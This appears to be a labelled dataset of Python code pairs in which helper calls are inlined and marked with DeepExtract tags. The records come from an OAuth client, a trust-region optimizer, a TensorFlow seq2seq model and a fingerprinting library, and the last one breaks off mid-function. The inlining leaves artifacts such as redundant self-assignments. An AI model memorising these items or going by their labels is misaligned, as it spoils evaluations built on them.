self.access_token = response.get(u'access_token')
if u'refresh_token' in response:
self.refresh_token = response.get(u'refresh_token')
if u'token_type' in response:
self.token_type = response.get(u'token_type')
if u'expires_in' in response:
self.expires_in = response.get(u'expires_in')
if u'code' in response:
self.code = response.get(u'code')
</DeepExtract>
return response
|
def parse_request_body_response(self, body, scope=None):
"""Parse the JSON response body.
If the access token request is valid and authorized, the
authorization server issues an access token and optional refresh
token as described in `Section 5.1`_. If the request failed client
authentication or is invalid, the authorization server returns an
error response as described in `Section 5.2`_.
.. `Section 5.1`: http://tools.ietf.org/html/draft-ietf-oauth-v2-28#section-5.1
.. `Section 5.2`: http://tools.ietf.org/html/draft-ietf-oauth-v2-28#section-5.2
"""
response = parse_token_response(body, scope=scope)
if u'access_token' in response:
self.access_token = response.get(u'access_token')
if u'refresh_token' in response:
self.refresh_token = response.get(u'refresh_token')
if u'token_type' in response:
self.token_type = response.get(u'token_type')
if u'expires_in' in response:
self.expires_in = response.get(u'expires_in')
if u'code' in response:
self.code = response.get(u'code')
return response
|
alfred2-workflow-help
|
positive
|
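A toy illustration of the attribute-population step inside parse_request_body_response; the response dict below is a made-up example of a token-endpoint body after JSON parsing, and DummyClient stands in for the client object.
response = {
    u'access_token': u'2YotnFZFEjr1zCsicMWpAA',
    u'token_type': u'Bearer',
    u'expires_in': 3600,
    u'refresh_token': u'tGzv3JOkF0XG5Qx2TlKWIA',
}
class DummyClient(object):
    pass
client = DummyClient()
# Mirrors the if-chains above: copy whichever token fields are present onto the client.
for key in (u'access_token', u'refresh_token', u'token_type', u'expires_in', u'code'):
    if key in response:
        setattr(client, key, response[key])
print(client.access_token, client.expires_in)  # 2YotnFZFEjr1zCsicMWpAA 3600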
def minimize_trust_trsbox(model_gradient, model_hessian, trustregion_radius, *, lower_bounds, upper_bounds):
"""Minimize a qaudratic trust-region subproblem using the trsbox algorithm.
Solve the quadratic trust-region subproblem:
min_x g.T @ x + 0.5 * x.T @ hess @ x
s.t. ||x|| <= trustregion_radius
lower_bounds <= x <= upper_bounds
approximately, using an active-set approach, where g denotes the gradient
and hess the hessian of the quadratic model (i.e. the linear terms and
square_terms), respectively.
The subproblem is assumed to be centered, i.e. ``x_center`` is the zero vector.
The trsbox algorithm applies a conjugate gradient step in its main loop.
This implementation of the quadratic trsbox algorithm is based on
M. J. D. Powell (2009) "The BOBYQA algorithm for bound constrained
optimization without derivatives." (:cite:`Powell2009`).
Some modifications to the termination conditions are taken from the
DFBOLS method by Zhang et al. (:cite:`Zhang2010`).
Args:
model_gradient (np.ndarray): 1d array of shape (n,) containing the
gradient (i.e. linear terms) of the quadratic model.
model_hessian (np.ndarray): 2d array of shape (n, n) containing the
hessian (i.e. square terms) of the quadratic model.
lower_bounds (np.ndarray): 1d array of shape (n,) with lower bounds
for the parameter vector x.
upper_bounds (np.ndarray): 1d array of shape (n,) with upper bounds
for the parameter vector x.
trustregion_radius (float): Radius of the trust-region.
Returns:
np.ndarray: Solution vector for the quadratic trust-region subproblem
of shape (n,).
"""
n = len(model_gradient)
x_center = np.zeros(n)
n_iter = 0
n_fixed_variables = 0
x_bounded = np.zeros(n)
x_bounded[(x_center <= lower_bounds) & (model_gradient >= 0.0)] = -1
x_bounded[(x_center >= upper_bounds) & (model_gradient <= 0.0)] = 1
x_candidate = np.zeros(n)
gradient_projected = np.zeros(n)
gradient_candidate = model_gradient
total_reduction = 0
delta_sq = trustregion_radius ** 2
curve_min = -1.0
beta = 0
need_alt_trust_step = False
max_iter = 100 * n ** 2
for _ in range(max_iter):
gradient_projected[x_bounded != 0] = 0
if beta == 0:
gradient_projected[x_bounded == 0] = -gradient_candidate[x_bounded == 0]
else:
gradient_projected[x_bounded == 0] = beta * gradient_projected[x_bounded == 0] - gradient_candidate[x_bounded == 0]
gradient_projected_sumsq = gradient_projected @ gradient_projected
if gradient_projected_sumsq == 0:
need_alt_trust_step = False
break
if beta == 0:
gradient_sumsq = gradient_projected_sumsq
max_iter = n_iter + n - n_fixed_variables
if n_iter == 0:
gradient_sumsq_initial = gradient_sumsq
if gradient_sumsq <= min(1e-06 * gradient_sumsq_initial, 1e-18) or gradient_sumsq * delta_sq <= min(1e-06 * total_reduction ** 2, 1e-18):
need_alt_trust_step = False
break
hess_g = model_hessian @ gradient_projected
g_x = gradient_projected[x_bounded == 0] @ x_candidate[x_bounded == 0]
g_hess_g = gradient_projected[x_bounded == 0] @ hess_g[x_bounded == 0]
raw_distance = delta_sq - x_candidate[x_bounded == 0] @ x_candidate[x_bounded == 0]
if raw_distance <= 0:
need_alt_trust_step = True
break
<DeepExtract>
temp = np.sqrt(gradient_projected_sumsq * raw_distance + g_x ** 2)
if g_x >= 0:
distance_to_boundary = raw_distance / (temp + g_x)
else:
distance_to_boundary = (temp - g_x) / gradient_projected_sumsq
if g_hess_g <= 0:
step_len = distance_to_boundary
else:
step_len = min(distance_to_boundary, gradient_sumsq / g_hess_g)
(step_len, distance_to_boundary) = (step_len, distance_to_boundary)
</DeepExtract>
if step_len <= 1e-30:
need_alt_trust_step = False
break
<DeepExtract>
index_bound_active = None
for i in range(len(x_candidate)):
if gradient_projected[i] != 0:
if gradient_projected[i] > 0:
step_len_constr = (upper_bounds[i] - x_candidate[i]) / gradient_projected[i]
else:
step_len_constr = (lower_bounds[i] - x_candidate[i]) / gradient_projected[i]
if step_len_constr < step_len:
step_len = step_len_constr
index_bound_active = i
(step_len, index_bound_active) = (step_len, index_bound_active)
</DeepExtract>
current_reduction = 0
if step_len > 0:
n_iter += 1
<DeepExtract>
current_min = g_hess_g / gradient_projected_sumsq
if index_bound_active is None and current_min > 0:
if curve_min != -1.0:
curve_min = min(curve_min, current_min)
else:
curve_min = current_min
gradient_sumsq_old = gradient_sumsq
gradient_candidate = gradient_candidate + step_len * hess_g
x_candidate = x_candidate + step_len * gradient_projected
gradient_sumsq = gradient_candidate[x_bounded == 0] @ gradient_candidate[x_bounded == 0]
current_reduction = max(step_len * (gradient_sumsq_old - 0.5 * step_len * g_hess_g), 0)
total_reduction = total_reduction + current_reduction
(x_candidate, gradient_candidate, current_reduction, total_reduction, curve_min, gradient_sumsq, gradient_sumsq_old) = (x_candidate, gradient_candidate, current_reduction, total_reduction, curve_min, gradient_sumsq, gradient_sumsq_old)
</DeepExtract>
if index_bound_active is not None:
n_fixed_variables += 1
if gradient_projected[index_bound_active] >= 0:
x_bounded[index_bound_active] = 1
else:
x_bounded[index_bound_active] = -1
delta_sq = delta_sq - x_candidate[index_bound_active] ** 2
if delta_sq <= 0:
need_alt_trust_step = True
break
beta = 0
continue
if step_len >= distance_to_boundary:
need_alt_trust_step = True
break
if n_iter == max_iter or current_reduction <= 1e-06 * total_reduction:
need_alt_trust_step = False
break
beta = gradient_sumsq / gradient_sumsq_old
continue
if need_alt_trust_step:
curve_min = 0
<DeepExtract>
n = len(x_candidate)
max_iter = 100 * n ** 2
for _ in range(max_iter):
if n_fixed_variables >= n - 1:
x_candidate = _apply_bounds_to_candidate_vector(x_candidate, x_bounded, lower_bounds, upper_bounds)
break
search_direction = np.zeros(n)
search_direction[x_bounded == 0] = x_candidate[x_bounded == 0]
x_reduced = x_candidate[x_bounded == 0] @ x_candidate[x_bounded == 0]
x_grad = x_candidate[x_bounded == 0] @ gradient_candidate[x_bounded == 0]
gradient_reduced = gradient_candidate[x_bounded == 0] @ gradient_candidate[x_bounded == 0]
hess_s = model_hessian @ search_direction
hessian_reduced = hess_s
restart_alt_loop = False
for _ in range(max_iter):
raw_reduction = gradient_reduced * x_reduced - x_grad ** 2
if raw_reduction <= 0.0001 * total_reduction ** 2:
restart_alt_loop = False
break
(search_direction, s_norm) = _compute_new_search_direction_and_norm(x_candidate, x_bounded, x_reduced, gradient_candidate, x_grad, raw_reduction)
(x_bounded, index_active_bound, n_fixed_variables, active_bound, bound_on_tangent, free_variable_reached_bound) = _calc_upper_bound_on_tangent(x_candidate, search_direction, x_bounded, lower_bounds, upper_bounds, n_fixed_variables)
if free_variable_reached_bound:
restart_alt_loop = True
break
hess_s = model_hessian @ search_direction
s_hess_s = np.sum(search_direction[x_bounded == 0] * hess_s[x_bounded == 0])
x_hess_s = np.sum(x_candidate[x_bounded == 0] * hess_s[x_bounded == 0])
x_hess_x = np.sum(x_candidate[x_bounded == 0] * hessian_reduced[x_bounded == 0])
(previous_reduction, next_reduction, max_reduction, tangent, index_angle_greatest_reduction, n_angles) = _calc_greatest_criterion_reduction(bound_on_tangent, s_hess_s, x_hess_s, x_hess_x, x_grad, s_norm)
if index_angle_greatest_reduction == -1:
restart_alt_loop = False
break
if index_angle_greatest_reduction < n_angles - 1:
tangent = _update_tangent(index_angle_greatest_reduction, bound_on_tangent, n_angles, next_reduction, previous_reduction, max_reduction)
cosine = (1.0 - tangent ** 2) / (1.0 + tangent ** 2)
sine = 2.0 * tangent / (1.0 + tangent ** 2)
current_reduction = _calc_new_reduction(tangent, sine, s_hess_s, x_hess_x, x_hess_s, x_grad, s_norm)
if current_reduction <= 0.0:
restart_alt_loop = False
break
(x_candidate, gradient_candidate, x_grad, gradient_reduced, hessian_reduced) = _update_candidate_vectors_and_reduction_alt_step(x_candidate, search_direction, x_bounded, gradient_candidate, cosine, sine, hess_s, hessian_reduced)
total_reduction = total_reduction + current_reduction
if index_active_bound is not None and index_angle_greatest_reduction == n_angles - 1:
n_fixed_variables += 1
x_bounded[index_active_bound] = active_bound
restart_alt_loop = True
break
if current_reduction <= 0.01 * total_reduction:
restart_alt_loop = False
break
continue
if restart_alt_loop:
continue
else:
break
x_candidate = _apply_bounds_to_candidate_vector(x_candidate, x_bounded, lower_bounds, upper_bounds)
x_candidate = x_candidate
</DeepExtract>
else:
<DeepExtract>
x_candidate_new = np.clip(lower_bounds, x_candidate, upper_bounds)
x_candidate_new[x_bounded == -1] = lower_bounds[x_bounded == -1]
x_candidate_new[x_bounded == 1] = upper_bounds[x_bounded == 1]
x_candidate = x_candidate_new
</DeepExtract>
return x_candidate
|
def minimize_trust_trsbox(model_gradient, model_hessian, trustregion_radius, *, lower_bounds, upper_bounds):
"""Minimize a qaudratic trust-region subproblem using the trsbox algorithm.
Solve the quadratic trust-region subproblem:
min_x g.T @ x + 0.5 * x.T @ hess @ x
s.t. ||x|| <= trustregion_radius
lower_bounds <= x <= upper_bounds
approximately, using an active-set approach, where g denotes the gradient
and hess the hessian of the quadratic model (i.e. the linear terms and
square_terms), respectively.
The subproblem is assumed to be centered, i.e. ``x_center`` is the zero vector.
The trsbox algorithm applies a conjugate gradient step in its main loop.
This implementation of the quadratic trsbox algorithm is based on
M. J. D. Powell (2009) "The BOBYQA algorithm for bound constrained
optimization without derivatives." (:cite:`Powell2009`).
Some modifications to the termination conditions are taken from the
DFBOLS method by Zhang et al. (:cite:`Zhang2010`).
Args:
model_gradient (np.ndarray): 1d array of shape (n,) containing the
gradient (i.e. linear terms) of the quadratic model.
model_hessian (np.ndarray): 2d array of shape (n, n) containing the
hessian (i.e. square terms) of the quadratic model.
lower_bounds (np.ndarray): 1d array of shape (n,) with lower bounds
for the parameter vector x.
upper_bounds (np.ndarray): 1d array of shape (n,) with upper bounds
for the parameter vector x.
trustregion_radius (float): Radius of the trust-region.
Returns:
np.ndarray: Solution vector for the quadratic trust-region subproblem
of shape (n,).
"""
n = len(model_gradient)
x_center = np.zeros(n)
n_iter = 0
n_fixed_variables = 0
x_bounded = np.zeros(n)
x_bounded[(x_center <= lower_bounds) & (model_gradient >= 0.0)] = -1
x_bounded[(x_center >= upper_bounds) & (model_gradient <= 0.0)] = 1
x_candidate = np.zeros(n)
gradient_projected = np.zeros(n)
gradient_candidate = model_gradient
total_reduction = 0
delta_sq = trustregion_radius ** 2
curve_min = -1.0
beta = 0
need_alt_trust_step = False
max_iter = 100 * n ** 2
for _ in range(max_iter):
gradient_projected[x_bounded != 0] = 0
if beta == 0:
gradient_projected[x_bounded == 0] = -gradient_candidate[x_bounded == 0]
else:
gradient_projected[x_bounded == 0] = beta * gradient_projected[x_bounded == 0] - gradient_candidate[x_bounded == 0]
gradient_projected_sumsq = gradient_projected @ gradient_projected
if gradient_projected_sumsq == 0:
need_alt_trust_step = False
break
if beta == 0:
gradient_sumsq = gradient_projected_sumsq
max_iter = n_iter + n - n_fixed_variables
if n_iter == 0:
gradient_sumsq_initial = gradient_sumsq
if gradient_sumsq <= min(1e-06 * gradient_sumsq_initial, 1e-18) or gradient_sumsq * delta_sq <= min(1e-06 * total_reduction ** 2, 1e-18):
need_alt_trust_step = False
break
hess_g = model_hessian @ gradient_projected
g_x = gradient_projected[x_bounded == 0] @ x_candidate[x_bounded == 0]
g_hess_g = gradient_projected[x_bounded == 0] @ hess_g[x_bounded == 0]
raw_distance = delta_sq - x_candidate[x_bounded == 0] @ x_candidate[x_bounded == 0]
if raw_distance <= 0:
need_alt_trust_step = True
break
temp = np.sqrt(gradient_projected_sumsq * raw_distance + g_x ** 2)
if g_x >= 0:
distance_to_boundary = raw_distance / (temp + g_x)
else:
distance_to_boundary = (temp - g_x) / gradient_projected_sumsq
if g_hess_g <= 0:
step_len = distance_to_boundary
else:
step_len = min(distance_to_boundary, gradient_sumsq / g_hess_g)
(step_len, distance_to_boundary) = (step_len, distance_to_boundary)
if step_len <= 1e-30:
need_alt_trust_step = False
break
index_bound_active = None
for i in range(len(x_candidate)):
if gradient_projected[i] != 0:
if gradient_projected[i] > 0:
step_len_constr = (upper_bounds[i] - x_candidate[i]) / gradient_projected[i]
else:
step_len_constr = (lower_bounds[i] - x_candidate[i]) / gradient_projected[i]
if step_len_constr < step_len:
step_len = step_len_constr
index_bound_active = i
(step_len, index_bound_active) = (step_len, index_bound_active)
current_reduction = 0
if step_len > 0:
n_iter += 1
current_min = g_hess_g / gradient_projected_sumsq
if index_bound_active is None and current_min > 0:
if curve_min != -1.0:
curve_min = min(curve_min, current_min)
else:
curve_min = current_min
gradient_sumsq_old = gradient_sumsq
gradient_candidate = gradient_candidate + step_len * hess_g
x_candidate = x_candidate + step_len * gradient_projected
gradient_sumsq = gradient_candidate[x_bounded == 0] @ gradient_candidate[x_bounded == 0]
current_reduction = max(step_len * (gradient_sumsq_old - 0.5 * step_len * g_hess_g), 0)
total_reduction = total_reduction + current_reduction
(x_candidate, gradient_candidate, current_reduction, total_reduction, curve_min, gradient_sumsq, gradient_sumsq_old) = (x_candidate, gradient_candidate, current_reduction, total_reduction, curve_min, gradient_sumsq, gradient_sumsq_old)
if index_bound_active is not None:
n_fixed_variables += 1
if gradient_projected[index_bound_active] >= 0:
x_bounded[index_bound_active] = 1
else:
x_bounded[index_bound_active] = -1
delta_sq = delta_sq - x_candidate[index_bound_active] ** 2
if delta_sq <= 0:
need_alt_trust_step = True
break
beta = 0
continue
if step_len >= distance_to_boundary:
need_alt_trust_step = True
break
if n_iter == max_iter or current_reduction <= 1e-06 * total_reduction:
need_alt_trust_step = False
break
beta = gradient_sumsq / gradient_sumsq_old
continue
if need_alt_trust_step:
curve_min = 0
n = len(x_candidate)
max_iter = 100 * n ** 2
for _ in range(max_iter):
if n_fixed_variables >= n - 1:
x_candidate = _apply_bounds_to_candidate_vector(x_candidate, x_bounded, lower_bounds, upper_bounds)
break
search_direction = np.zeros(n)
search_direction[x_bounded == 0] = x_candidate[x_bounded == 0]
x_reduced = x_candidate[x_bounded == 0] @ x_candidate[x_bounded == 0]
x_grad = x_candidate[x_bounded == 0] @ gradient_candidate[x_bounded == 0]
gradient_reduced = gradient_candidate[x_bounded == 0] @ gradient_candidate[x_bounded == 0]
hess_s = model_hessian @ search_direction
hessian_reduced = hess_s
restart_alt_loop = False
for _ in range(max_iter):
raw_reduction = gradient_reduced * x_reduced - x_grad ** 2
if raw_reduction <= 0.0001 * total_reduction ** 2:
restart_alt_loop = False
break
(search_direction, s_norm) = _compute_new_search_direction_and_norm(x_candidate, x_bounded, x_reduced, gradient_candidate, x_grad, raw_reduction)
(x_bounded, index_active_bound, n_fixed_variables, active_bound, bound_on_tangent, free_variable_reached_bound) = _calc_upper_bound_on_tangent(x_candidate, search_direction, x_bounded, lower_bounds, upper_bounds, n_fixed_variables)
if free_variable_reached_bound:
restart_alt_loop = True
break
hess_s = model_hessian @ search_direction
s_hess_s = np.sum(search_direction[x_bounded == 0] * hess_s[x_bounded == 0])
x_hess_s = np.sum(x_candidate[x_bounded == 0] * hess_s[x_bounded == 0])
x_hess_x = np.sum(x_candidate[x_bounded == 0] * hessian_reduced[x_bounded == 0])
(previous_reduction, next_reduction, max_reduction, tangent, index_angle_greatest_reduction, n_angles) = _calc_greatest_criterion_reduction(bound_on_tangent, s_hess_s, x_hess_s, x_hess_x, x_grad, s_norm)
if index_angle_greatest_reduction == -1:
restart_alt_loop = False
break
if index_angle_greatest_reduction < n_angles - 1:
tangent = _update_tangent(index_angle_greatest_reduction, bound_on_tangent, n_angles, next_reduction, previous_reduction, max_reduction)
cosine = (1.0 - tangent ** 2) / (1.0 + tangent ** 2)
sine = 2.0 * tangent / (1.0 + tangent ** 2)
current_reduction = _calc_new_reduction(tangent, sine, s_hess_s, x_hess_x, x_hess_s, x_grad, s_norm)
if current_reduction <= 0.0:
restart_alt_loop = False
break
(x_candidate, gradient_candidate, x_grad, gradient_reduced, hessian_reduced) = _update_candidate_vectors_and_reduction_alt_step(x_candidate, search_direction, x_bounded, gradient_candidate, cosine, sine, hess_s, hessian_reduced)
total_reduction = total_reduction + current_reduction
if index_active_bound is not None and index_angle_greatest_reduction == n_angles - 1:
n_fixed_variables += 1
x_bounded[index_active_bound] = active_bound
restart_alt_loop = True
break
if current_reduction <= 0.01 * total_reduction:
restart_alt_loop = False
break
continue
if restart_alt_loop:
continue
else:
break
x_candidate = _apply_bounds_to_candidate_vector(x_candidate, x_bounded, lower_bounds, upper_bounds)
x_candidate = x_candidate
else:
x_candidate_new = np.clip(lower_bounds, x_candidate, upper_bounds)
x_candidate_new[x_bounded == -1] = lower_bounds[x_bounded == -1]
x_candidate_new[x_bounded == 1] = upper_bounds[x_bounded == 1]
x_candidate = x_candidate_new
return x_candidate
|
estimagic
|
positive
|
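For reference, the bound-constrained trust-region subproblem stated in the minimize_trust_trsbox docstring, written out in LaTeX (g = model_gradient, H = model_hessian, Delta = trustregion_radius, l and u = lower_bounds / upper_bounds):
\min_{x \in \mathbb{R}^n} \; g^{\top} x + \tfrac{1}{2}\, x^{\top} H x
\quad \text{s.t.} \quad \lVert x \rVert_2 \le \Delta, \qquad l \le x \le u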
def __init__(self, source_vocab_size, target_vocab_size, buckets, size, num_layers, max_gradient_norm, batch_size, learning_rate, learning_rate_decay_factor, use_lstm=False, num_samples=512, forward_only=False, dtype=tf.float32):
"""Create the model.
Args:
source_vocab_size: size of the source vocabulary.
target_vocab_size: size of the target vocabulary.
buckets: a list of pairs (I, O), where I specifies maximum input length
that will be processed in that bucket, and O specifies maximum output
length. Training instances that have inputs longer than I or outputs
longer than O will be pushed to the next bucket and padded accordingly.
We assume that the list is sorted, e.g., [(2, 4), (8, 16)].
size: number of units in each layer of the model.
num_layers: number of layers in the model.
max_gradient_norm: gradients will be clipped to maximally this norm.
batch_size: the size of the batches used during training;
the model construction is independent of batch_size, so it can be
changed after initialization if this is convenient, e.g., for decoding.
learning_rate: learning rate to start with.
learning_rate_decay_factor: decay learning rate by this much when needed.
use_lstm: if true, we use LSTM cells instead of GRU cells.
num_samples: number of samples for sampled softmax.
forward_only: if set, we do not construct the backward pass in the model.
dtype: the data type to use to store internal variables.
"""
self.source_vocab_size = source_vocab_size
self.target_vocab_size = target_vocab_size
self.buckets = buckets
self.batch_size = batch_size
self.learning_rate = tf.Variable(float(learning_rate), trainable=False, dtype=dtype)
self.learning_rate_decay_op = self.learning_rate.assign(self.learning_rate * learning_rate_decay_factor)
self.global_step = tf.Variable(0, trainable=False)
output_projection = None
softmax_loss_function = None
if num_samples > 0 and num_samples < self.target_vocab_size:
w_t = tf.get_variable('proj_w', [self.target_vocab_size, size], dtype=dtype)
w = tf.transpose(w_t)
b = tf.get_variable('proj_b', [self.target_vocab_size], dtype=dtype)
output_projection = (w, b)
def sampled_loss(labels, logits):
labels = tf.reshape(labels, [-1, 1])
local_w_t = tf.cast(w_t, tf.float32)
local_b = tf.cast(b, tf.float32)
local_inputs = tf.cast(logits, tf.float32)
return tf.cast(tf.nn.sampled_softmax_loss(weights=local_w_t, biases=local_b, labels=labels, inputs=local_inputs, num_sampled=num_samples, num_classes=self.target_vocab_size), dtype)
softmax_loss_function = sampled_loss
def get_lstm():
cell = tf.contrib.rnn.BasicLSTMCell(size, state_is_tuple=True, reuse=tf.get_variable_scope().reuse)
return tf.contrib.rnn.DropoutWrapper(cell, output_keep_prob=0.8)
def single_cell():
cell = tf.contrib.rnn.GRUCell(size)
return tf.contrib.rnn.DropoutWrapper(cell, output_keep_prob=0.8)
if use_lstm:
def single_cell():
return tf.contrib.rnn.BasicLSTMCell(size)
<DeepExtract>
cell = tf.contrib.rnn.GRUCell(size)
cell = tf.contrib.rnn.DropoutWrapper(cell, output_keep_prob=0.8)
</DeepExtract>
if num_layers > 1:
cell = tf.contrib.rnn.MultiRNNCell([single_cell() for _ in range(num_layers)])
def seq2seq_f(encoder_inputs, decoder_inputs, do_decode):
return seq2seq.embedding_rnn_seq2seq(encoder_inputs, decoder_inputs, cell, num_encoder_symbols=source_vocab_size, num_decoder_symbols=target_vocab_size, embedding_size=size, output_projection=output_projection, feed_previous=do_decode, dtype=dtype)
self.encoder_inputs = []
self.decoder_inputs = []
self.target_weights = []
for i in xrange(buckets[-1][0]):
self.encoder_inputs.append(tf.placeholder(tf.int32, shape=[None], name='encoder{0}'.format(i)))
for i in xrange(buckets[-1][1] + 1):
self.decoder_inputs.append(tf.placeholder(tf.int32, shape=[None], name='decoder{0}'.format(i)))
self.target_weights.append(tf.placeholder(dtype, shape=[None], name='weight{0}'.format(i)))
targets = [self.decoder_inputs[i + 1] for i in xrange(len(self.decoder_inputs) - 1)]
if forward_only:
(self.outputs, self.losses, self.states, self.enc_outputs) = seq2seq.model_with_buckets(self.encoder_inputs, self.decoder_inputs, targets, self.target_weights, buckets, lambda x, y: seq2seq_f(x, y, True), softmax_loss_function=softmax_loss_function)
if output_projection is not None:
for b in xrange(len(buckets)):
self.outputs[b] = [tf.matmul(output, output_projection[0]) + output_projection[1] for output in self.outputs[b]]
else:
(self.outputs, self.losses, self.states, self.enc_outputs) = seq2seq.model_with_buckets(self.encoder_inputs, self.decoder_inputs, targets, self.target_weights, buckets, lambda x, y: seq2seq_f(x, y, False), softmax_loss_function=softmax_loss_function)
params = tf.trainable_variables()
if True:
self.gradient_norms = []
self.updates = []
opt = tf.train.GradientDescentOptimizer(self.learning_rate)
for b in xrange(len(buckets)):
gradients = tf.gradients(self.losses[b], params)
(clipped_gradients, norm) = tf.clip_by_global_norm(gradients, max_gradient_norm)
self.gradient_norms.append(norm)
self.updates.append(opt.apply_gradients(zip(clipped_gradients, params), global_step=self.global_step))
self.saver = tf.train.Saver(tf.global_variables())
|
def __init__(self, source_vocab_size, target_vocab_size, buckets, size, num_layers, max_gradient_norm, batch_size, learning_rate, learning_rate_decay_factor, use_lstm=False, num_samples=512, forward_only=False, dtype=tf.float32):
"""Create the model.
Args:
source_vocab_size: size of the source vocabulary.
target_vocab_size: size of the target vocabulary.
buckets: a list of pairs (I, O), where I specifies maximum input length
that will be processed in that bucket, and O specifies maximum output
length. Training instances that have inputs longer than I or outputs
longer than O will be pushed to the next bucket and padded accordingly.
We assume that the list is sorted, e.g., [(2, 4), (8, 16)].
size: number of units in each layer of the model.
num_layers: number of layers in the model.
max_gradient_norm: gradients will be clipped to maximally this norm.
batch_size: the size of the batches used during training;
the model construction is independent of batch_size, so it can be
changed after initialization if this is convenient, e.g., for decoding.
learning_rate: learning rate to start with.
learning_rate_decay_factor: decay learning rate by this much when needed.
use_lstm: if true, we use LSTM cells instead of GRU cells.
num_samples: number of samples for sampled softmax.
forward_only: if set, we do not construct the backward pass in the model.
dtype: the data type to use to store internal variables.
"""
self.source_vocab_size = source_vocab_size
self.target_vocab_size = target_vocab_size
self.buckets = buckets
self.batch_size = batch_size
self.learning_rate = tf.Variable(float(learning_rate), trainable=False, dtype=dtype)
self.learning_rate_decay_op = self.learning_rate.assign(self.learning_rate * learning_rate_decay_factor)
self.global_step = tf.Variable(0, trainable=False)
output_projection = None
softmax_loss_function = None
if num_samples > 0 and num_samples < self.target_vocab_size:
w_t = tf.get_variable('proj_w', [self.target_vocab_size, size], dtype=dtype)
w = tf.transpose(w_t)
b = tf.get_variable('proj_b', [self.target_vocab_size], dtype=dtype)
output_projection = (w, b)
def sampled_loss(labels, logits):
labels = tf.reshape(labels, [-1, 1])
local_w_t = tf.cast(w_t, tf.float32)
local_b = tf.cast(b, tf.float32)
local_inputs = tf.cast(logits, tf.float32)
return tf.cast(tf.nn.sampled_softmax_loss(weights=local_w_t, biases=local_b, labels=labels, inputs=local_inputs, num_sampled=num_samples, num_classes=self.target_vocab_size), dtype)
softmax_loss_function = sampled_loss
def get_lstm():
cell = tf.contrib.rnn.BasicLSTMCell(size, state_is_tuple=True, reuse=tf.get_variable_scope().reuse)
return tf.contrib.rnn.DropoutWrapper(cell, output_keep_prob=0.8)
def single_cell():
cell = tf.contrib.rnn.GRUCell(size)
return tf.contrib.rnn.DropoutWrapper(cell, output_keep_prob=0.8)
if use_lstm:
def single_cell():
return tf.contrib.rnn.BasicLSTMCell(size)
cell = tf.contrib.rnn.GRUCell(size)
cell = tf.contrib.rnn.DropoutWrapper(cell, output_keep_prob=0.8)
if num_layers > 1:
cell = tf.contrib.rnn.MultiRNNCell([single_cell() for _ in range(num_layers)])
def seq2seq_f(encoder_inputs, decoder_inputs, do_decode):
return seq2seq.embedding_rnn_seq2seq(encoder_inputs, decoder_inputs, cell, num_encoder_symbols=source_vocab_size, num_decoder_symbols=target_vocab_size, embedding_size=size, output_projection=output_projection, feed_previous=do_decode, dtype=dtype)
self.encoder_inputs = []
self.decoder_inputs = []
self.target_weights = []
for i in xrange(buckets[-1][0]):
self.encoder_inputs.append(tf.placeholder(tf.int32, shape=[None], name='encoder{0}'.format(i)))
for i in xrange(buckets[-1][1] + 1):
self.decoder_inputs.append(tf.placeholder(tf.int32, shape=[None], name='decoder{0}'.format(i)))
self.target_weights.append(tf.placeholder(dtype, shape=[None], name='weight{0}'.format(i)))
targets = [self.decoder_inputs[i + 1] for i in xrange(len(self.decoder_inputs) - 1)]
if forward_only:
(self.outputs, self.losses, self.states, self.enc_outputs) = seq2seq.model_with_buckets(self.encoder_inputs, self.decoder_inputs, targets, self.target_weights, buckets, lambda x, y: seq2seq_f(x, y, True), softmax_loss_function=softmax_loss_function)
if output_projection is not None:
for b in xrange(len(buckets)):
self.outputs[b] = [tf.matmul(output, output_projection[0]) + output_projection[1] for output in self.outputs[b]]
else:
(self.outputs, self.losses, self.states, self.enc_outputs) = seq2seq.model_with_buckets(self.encoder_inputs, self.decoder_inputs, targets, self.target_weights, buckets, lambda x, y: seq2seq_f(x, y, False), softmax_loss_function=softmax_loss_function)
params = tf.trainable_variables()
if True:
self.gradient_norms = []
self.updates = []
opt = tf.train.GradientDescentOptimizer(self.learning_rate)
for b in xrange(len(buckets)):
gradients = tf.gradients(self.losses[b], params)
(clipped_gradients, norm) = tf.clip_by_global_norm(gradients, max_gradient_norm)
self.gradient_norms.append(norm)
self.updates.append(opt.apply_gradients(zip(clipped_gradients, params), global_step=self.global_step))
self.saver = tf.train.Saver(tf.global_variables())
|
DeepAffinity
|
positive
|
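A small sketch (not part of the model code above) of the bucket-selection rule described in the docstring: a training pair goes into the smallest bucket whose (I, O) limits it fits.
def pick_bucket(buckets, encoder_len, decoder_len):
    # buckets is assumed sorted, e.g. [(2, 4), (8, 16)], as in the docstring.
    for bucket_id, (in_size, out_size) in enumerate(buckets):
        if encoder_len <= in_size and decoder_len <= out_size:
            return bucket_id
    raise ValueError('sequence longer than the largest bucket')
buckets = [(2, 4), (8, 16)]
print(pick_bucket(buckets, encoder_len=5, decoder_len=10))  # 1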
def fprints_from_sdf(sdf_file, fprint_params={}, save=False):
"""Generate fingerprints from conformers in an SDF file."""
mol = mol_from_sdf(sdf_file)
<DeepExtract>
fprints_dict = fprints_dict_from_mol(mol, save=save, **fprint_params)
level = fprint_params.get('level', -1)
fprints_list = fprints_from_fprints_dict(fprints_dict, level=level)
fprints_list = fprints_list
</DeepExtract>
return fprints_list
|
def fprints_from_sdf(sdf_file, fprint_params={}, save=False):
"""Generate fingerprints from conformers in an SDF file."""
mol = mol_from_sdf(sdf_file)
fprints_dict = fprints_dict_from_mol(mol, save=save, **fprint_params)
level = fprint_params.get('level', -1)
fprints_list = fprints_from_fprints_dict(fprints_dict, level=level)
fprints_list = fprints_list
return fprints_list
|
e3fp
|
positive
|
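A hypothetical call to fprints_from_sdf above; 'ligand.sdf' is a placeholder path, and the 'level' key matches the fprint_params lookup shown in the code.
fprints = fprints_from_sdf('ligand.sdf', fprint_params={'level': 5})
print(len(fprints))  # list of fingerprints, typically one per conformer in the SDF file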
def test_convolution():
n_filters = [1, 5, 10]
win_shapes = [(1, 1), (3, 3), (5, 5)]
strides = [(1, 1), (2, 2), (3, 3)]
border_modes = ['valid', 'same', 'full']
confs = itertools.product(batch_sizes, n_channels, img_shapes, n_filters, win_shapes, strides, border_modes)
confs = shuffled(confs)[:100]
for (batch_size, n_channel, img_shape, n_filter, win_shape, stride, border_mode) in confs:
if img_shape[0] < win_shape[0] or img_shape[1] < win_shape[1]:
continue
print('Convolution: batch_size=%i, n_channel=%i, img_shape=%s, n_filter=%i, win_shape=%s, stride=%s, border_mode=%s' % (batch_size, n_channel, str(img_shape), n_filter, str(win_shape), str(stride), border_mode))
x_shape = (batch_size, n_channel) + img_shape
